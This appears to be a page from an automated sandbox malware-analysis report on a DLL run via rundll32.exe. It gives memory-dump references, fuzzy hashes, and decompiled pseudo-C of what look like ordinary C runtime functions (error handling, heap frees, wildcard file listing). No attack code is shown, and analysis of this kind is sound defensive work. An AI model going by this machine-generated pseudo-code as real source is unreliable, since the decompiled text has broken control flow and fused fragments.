GetLastError.KERNEL32(00000001,?,6F31D578,6F31CC5A,6F31C7BB,?,6F31C9D8,?,00000001,?,?,00000001,?,6F344F78,0000000C,6F31CACC), ref: 6F31D7D4
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F31D7E2
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F31D7FB
SetLastError.KERNEL32(00000000,6F31C9D8,?,00000001,?,?,00000001,?,6F344F78,0000000C,6F31CACC,?,00000001,?), ref: 6F31D84D

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 65280b82df6ae233c4d3e41790d91be501712b99b4fbec7999ce55af4dee8376
Instruction ID: bc431c1e8930bf4ba0d52d70ba7e9a7b0ed2e3ca24e3def14019fbcd813638dd
Opcode Fuzzy Hash: 65280b82df6ae233c4d3e41790d91be501712b99b4fbec7999ce55af4dee8376
Instruction Fuzzy Hash: 5501F73220DB116FAB1CAA7CAC85A473BAEEF43778720433EE5114A2D0EF135818D150

Uniqueness

Uniqueness Score: -1.00%

Function 6F321D1D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F321D1D(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6F3227A9(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6F3227A9(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6F32016E(GetLastError());
									_t17 =  *((intOrPtr*)(E6F3201A4(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6F321DE4(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6F32016E(GetLastError());
						_t17 =  *((intOrPtr*)(E6F3201A4(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6F321DE4(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6F321E0B(_a8);
				return 0;
			}

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F321D22

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: bce1fd6915f848572d91c4580dec105ee25c6be775b0292de9883374af9d298b
Instruction ID: 79f470c77d70edead86989fd86dcf9f4024f68096861de2cd21dc0e7a4171a9d
Opcode Fuzzy Hash: bce1fd6915f848572d91c4580dec105ee25c6be775b0292de9883374af9d298b
Instruction Fuzzy Hash: E0215E75608215FFEB20AFA58E8096B77EDAE413A97004619E954AB190EF33FC5187B0

Uniqueness

Uniqueness Score: -1.00%

Function 6F31F49B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6F31F49B(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6f328124(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6f31f4a1
0x6f31f4a5
0x6f31f4b0
0x6f31f4b8
0x6f31f4c3
0x6f31f4c9
0x6f31f4cd
0x6f31f4d4
0x6f31f4da
0x6f31f4da
0x6f31f4dc
0x6f31f4e1
0x00000000
0x6f31f4e6
0x6f31f4ef

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6F31F44D,?,?,6F31F415,?,00000001,?), ref: 6F31F4B0
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F31F4C3
FreeLibrary.KERNEL32(00000000,?,?,6F31F44D,?,?,6F31F415,?,00000001,?), ref: 6F31F4E6

Strings

CorExitProcess, xrefs: 6F31F4BB
mscoree.dll, xrefs: 6F31F4A9

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cb9ffe15d4796d88316ddfe3817dd1cba03d749448c6024f2d539b54dec4adf9
Instruction ID: 3257add70971b96f7470e5f77f3aaa1686503df909451f9539444d49402c887e
Opcode Fuzzy Hash: cb9ffe15d4796d88316ddfe3817dd1cba03d749448c6024f2d539b54dec4adf9
Instruction Fuzzy Hash: 1DF08231909A18FBDF11DB50CD09BDE7EBCEF05325F00806AF904A1190CF359E20DA94

Uniqueness

Uniqueness Score: -1.00%

Function 6F324706, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F324706(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6f346790; // 0x6f3467e0
					if(_t23 != 0) {
						E6F31FEFF(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6f346794; // 0x6f35e7e8
					if(_t24 != 0) {
						E6F31FEFF(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6f346798; // 0x6f35e7e8
					if(_t25 != 0) {
						E6F31FEFF(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6f3467c0; // 0x6f3467e4
					if(_t26 != 0) {
						E6F31FEFF(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6f3467c4; // 0x6f35e7ec
					if(_t27 != 0) {
						return E6F31FEFF(_t6);
					}
				}
				return _t6;
			}

APIs

_free.LIBCMT ref: 6F32471E

Part of subcall function 6F31FEFF: RtlFreeHeap.NTDLL(00000000,00000000,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?), ref: 6F31FF15
Part of subcall function 6F31FEFF: GetLastError.KERNEL32(?,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?,?), ref: 6F31FF27

_free.LIBCMT ref: 6F324730
_free.LIBCMT ref: 6F324742
_free.LIBCMT ref: 6F324754
_free.LIBCMT ref: 6F324766

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5ee52f7b7880d85ca3f7ca6072694ecec41cda98f154b2ae6e8a60dcc9856fb7
Instruction ID: 064b918a12af7983137c8934a04f1e4603c000f925be143d9650025a6cd4e84e
Opcode Fuzzy Hash: 5ee52f7b7880d85ca3f7ca6072694ecec41cda98f154b2ae6e8a60dcc9856fb7
Instruction Fuzzy Hash: DDF0FF31508744DB8A14EE6CE5C5C5F7BDDFA82764761180AE079D7A42CF21F8844AA4

Uniqueness

Uniqueness Score: -1.00%

Function 6F321699, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6F321699(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t305;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				signed int _t314;
				void* _t315;
				void* _t316;

				_t131 = _a8;
				_t312 = _t311 - 0x28;
				_t320 = _t131;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E6F31F7DC(_t136, _t272, _v8, 1);
						_t313 = _t312 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6F324A43(_t234, _v28 - _t234 + _v8, _v24);
									_t313 = _t313 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E6F3200F7();
										asm("int3");
										_t309 = _t313;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E6F3201B7(_t242, _t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E6F324A43(_t302 + _t287, _t226, _v0);
												_t314 = _t313 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E6F321C8B(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t305 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6F31FEFF(_t302);
														_t305 = _v12;
													}
													E6F31FEFF(0);
													_t210 = _t305;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E6F324A43(_t302, _t226, _a4);
												_t314 = _t313 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6F3200F7();
													asm("int3");
													_push(_t309);
													_t310 = _t314;
													_t315 = _t314 - 0x298;
													_t166 =  *0x6f34609c; // 0xdcaf13c8
													_v124 = _t166 ^ _t310;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E6F324A90(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E6F32167A(_t245 - _t289 + 1, _t289,  &_v676, E6F321B96(_t279, __eflags));
														_t316 = _t315 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E6F3215AB( &(_v608.cFileName),  &_v640,  &_v609, E6F321B96(_t279, __eflags));
																_t316 = _t316 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t316 = _t316 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E6F31FEFF(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t303);
																goto L77;
																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E6F31FEFF(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E6F31EB90(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E6F3214E1);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E6F31FEFF(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t310;
													return E6F31C65E(_v16 ^ _t310);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E6F31FEFF(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E6F324A50(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t312 = _t312 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t312 = _t312 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E6F31FEFF( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E6F31FEFF(_t285);
						goto L31;
					}
				} else {
					_t220 = E6F3201A4(_t320);
					_t299 = 0x16;
					 *_t220 = _t299;
					E6F3200E7();
					L31:
					return _t299;
				}
				L81:
			}

APIs

_free.LIBCMT ref: 6F321833

Strings

*?, xrefs: 6F3216DC

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 834d10d10cefc13e59b5b3ede005935d13e01a0ad1254e615dddca7c9f39287c
Instruction ID: feb6599c535dc25b78aa85e9af78e3c997bc08b8ba3d87a36c36ba0911bd7046
Opcode Fuzzy Hash: 834d10d10cefc13e59b5b3ede005935d13e01a0ad1254e615dddca7c9f39287c
Instruction Fuzzy Hash: 15613CB5E042199FDB14DFA9C9805EEFBF5EF88314B24816AD854F7340D772AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F3215AB, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3215AB(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6F3227A9(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6F3227A9(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6F32016E(GetLastError());
									_t19 =  *((intOrPtr*)(E6F3201A4(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6F321BF1(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6F32016E(GetLastError());
						return  *((intOrPtr*)(E6F3201A4(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6F321BF1(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6F321BD7(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

APIs

Part of subcall function 6F321BD7: _free.LIBCMT ref: 6F321BE5

Part of subcall function 6F3227A9: WideCharToMultiByte.KERNEL32(?,00000000,6F32084A,00000000,00000001,6F3207E3,6F323ABD,?,6F32084A,?,00000000,?,6F323834,0000FDE9,00000000,?), ref: 6F32284B

GetLastError.KERNEL32 ref: 6F321613
__dosmaperr.LIBCMT ref: 6F32161A
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6F321659
__dosmaperr.LIBCMT ref: 6F321660

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: d1b0333cc93ed61ff9a4aec9ef519b8bb90d8aa66451446e1fcbf29af63e7d4f
Instruction ID: 296ac4ac41a773112aa41b67ba9317228fe7709ba90e0baad02b44750927f56a
Opcode Fuzzy Hash: d1b0333cc93ed61ff9a4aec9ef519b8bb90d8aa66451446e1fcbf29af63e7d4f
Instruction Fuzzy Hash: A9219D72608205AFAB10AF658E8091FB7ECFF453787148618FC6597290EB32EC518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F32103A, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6F32103A(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6f34619c; // 0x6
